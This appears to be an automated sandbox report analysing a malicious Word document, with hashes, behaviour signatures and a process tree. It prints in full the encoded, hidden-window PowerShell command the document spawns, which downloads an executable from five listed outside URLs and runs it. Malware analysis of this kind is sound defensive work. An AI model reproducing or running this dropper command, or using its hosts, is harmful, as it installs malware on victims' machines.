Analysis

  • max time kernel
    133s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 09:17

General

  • Target

    523c250d1911c432d329a21cfb987165e7cb3c70d5e83910cca688334a6228ae.doc

  • Size

    243KB

  • MD5

    223b958e302f09502a5a32029a865886

  • SHA1

    0399b1175936f7a11a709f60d3efec16af959274

  • SHA256

    523c250d1911c432d329a21cfb987165e7cb3c70d5e83910cca688334a6228ae

  • SHA512

    43d06e4fd60753dac3de5ac09b0d02803a6f492e97d906057cf8ac37baa91e6acfd40be838bce9f2ea7bb16195bdc34921eb02e2e642f1a2db29dfa0f9eafce6

  • SSDEEP

    6144:a0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+UZUQGMC:a0E3dxtR/iU9mvUPbQGMC

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.hgklighting.com/wp-admin/g0bm/

exe.dropper

http://thegioilap.vn/wp-content/EV/

exe.dropper

http://pilkom.ulm.ac.id/wp-content/r4iio/

exe.dropper

http://165.227.220.53/wp-includes/YEQ4r/

exe.dropper

https://jelajahpulautidung.com/t4ierwnn/8j/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\523c250d1911c432d329a21cfb987165e7cb3c70d5e83910cca688334a6228ae.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4232
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABXAGUAbgBxAG8AagBtAHgAPQAnAE0AbQB5AGMAegB2AHoAbgBjACcAOwAkAFkAbQBoAHYAcAB5AHIAcABzAG8AdgB5AG8AIAA9ACAAJwA0ADQAOQAnADsAJABMAG8AbwB3AGUAYwB0AGUAPQAnAEcAbABiAHAAbgB4AHUAbwBtAHAAbwBtACcAOwAkAFoAbABpAHkAcAB4AHQAYgBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZAG0AaAB2AHAAeQByAHAAcwBvAHYAeQBvACsAJwAuAGUAeABlACcAOwAkAFMAbQBzAHMAdwBsAG0AZwBvAHUAPQAnAEIAcwBlAGoAZABwAHYAcwBnAG4AYQBrAGkAJwA7ACQASgBmAG8AbQBsAGgAdgBvAGMAZgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAHQALgBXAGUAYgBjAEwASQBFAG4AdAA7ACQAUgBlAGMAZABpAGYAdAB0AHYAawA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AaABnAGsAbABpAGcAaAB0AGkAbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBnADAAYgBtAC8AKgBoAHQAdABwADoALwAvAHQAaABlAGcAaQBvAGkAbABhAHAALgB2AG4ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ARQBWAC8AKgBoAHQAdABwADoALwAvAHAAaQBsAGsAbwBtAC4AdQBsAG0ALgBhAGMALgBpAGQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcgA0AGkAaQBvAC8AKgBoAHQAdABwADoALwAvADEANgA1AC4AMgAyADcALgAyADIAMAAuADUAMwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFkARQBRADQAcgAvACoAaAB0AHQAcABzADoALwAvAGoAZQBsAGEAagBhAGgAcAB1AGwAYQB1AHQAaQBkAHUAbgBnAC4AYwBvAG0ALwB0ADQAaQBlAHIAdwBuAG4ALwA4AGoALwAnAC4AIgBTAHAAYABMAEkAVAAiACgAJwAqACcAKQA7ACQATgB6AHoAbgB6AG0AYwBlAHIAagBiAGkAPQAnAFoAdwBoAHcAbwB3AGMAagBjACcAOwBmAG8AcgBlAGEAYwBoACgAJABUAHgAbQB3AGEAawBiAGsAZwBkAG4AbgB0ACAAaQBuACAAJABSAGUAYwBkAGkAZgB0AHQAdgBrACkAewB0AHIAeQB7ACQASgBmAG8AbQBsAGgAdgBvAGMAZgAuACIARABgAG8AYABXAE4AbABPAEEAYABkAGYASQBsAGUAIgAoACQAVAB4AG0AdwBhAGsAYgBrAGcAZABuAG4AdAAsACAAJABaAGwAaQB5AHAAeAB0AGIAbgApADsAJABRAGoAZgBlAGwAaQBrAHUAcgB5AGgAbwBnAD0AJwBZAG4AbQB6AGIAaAB1AGwAZwBxACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWgBsAGkAeQBwAHgAdABiAG4AKQAuACIAbABlAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAzADIAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAVAAiACgAJABaAGwAaQB5AHAAeAB0AGIAbgApADsAJABHAHEAZQB3AG4AbwBpAGQAdwB6AGYAYgA9ACcASgBpAHMAaABhAGQAYgB4AG8AdwBkACcAOwBiAHIAZQBhAGsAOwAkAFcAeAB6AG8AcwB2AHEAbwBiAHUAawBiAD0AJwBKAGIAbwBnAHkAawBzAGsAZABuACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAcgBpAGMAaABzAGQAdwBtAGYAeABrAD0AJwBBAGEAaQBvAGgAZwBpAHMAcwAnAA==
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1248

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_osfhbh4c.vum.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • memory/1248-51-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/1248-560-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/1248-76-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/1248-52-0x00000232CF700000-0x00000232CF722000-memory.dmp

    Filesize

    136KB

  • memory/4232-15-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-50-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-8-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-7-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-11-0x00007FFD98C50000-0x00007FFD98C60000-memory.dmp

    Filesize

    64KB

  • memory/4232-6-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-13-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-14-0x00007FFD98C50000-0x00007FFD98C60000-memory.dmp

    Filesize

    64KB

  • memory/4232-12-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-17-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-16-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-18-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-0-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

    Filesize

    64KB

  • memory/4232-29-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-30-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-48-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-47-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-10-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-9-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-5-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

    Filesize

    64KB

  • memory/4232-4-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

    Filesize

    64KB

  • memory/4232-62-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-64-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-63-0x00007FFDDADED000-0x00007FFDDADEE000-memory.dmp

    Filesize

    4KB

  • memory/4232-65-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-66-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-67-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-68-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-69-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-75-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

    Filesize

    2.0MB

  • memory/4232-2-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

    Filesize

    64KB

  • memory/4232-3-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

    Filesize

    64KB

  • memory/4232-1-0x00007FFDDADED000-0x00007FFDDADEE000-memory.dmp

    Filesize

    4KB